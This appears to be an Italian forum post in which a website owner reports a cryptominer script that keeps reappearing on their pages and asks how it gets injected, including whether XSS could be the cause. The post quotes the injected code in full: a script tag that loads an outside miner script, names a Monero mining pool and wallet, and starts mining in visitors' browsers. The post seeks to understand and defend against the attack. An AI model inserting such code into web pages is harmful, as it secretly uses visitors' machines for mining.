Recentemente ho notato il seguente javascript su molte delle mie pagine (di solito appena prima della chiusura del body tag):
<script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptoknight.cc:9221"></script><scripttype="text/javascript">PerfektStart('46PgJtwUkg18z7Cu7xAd2F972GSEQUzoGHWP4fwUHbdj7qgZqhf27Pm7Y7BdMUH2gahQdrCmbKxNuJAyUrGfThnhCgEyinb', 'x');throttleMiner = 50;</script>
Mi rendo conto che qualcuno sta mettendo cryptominer sulle mie pagine. Se lo cancello diversi giorni dopo ritorna.
La mia domanda è: come è possibile che un utente malintenzionato inserisca il codice direttamente nel documento? Non avresti bisogno delle credenziali del server per accedere e modificare i file sul server?
È possibile con gli attacchi XSS?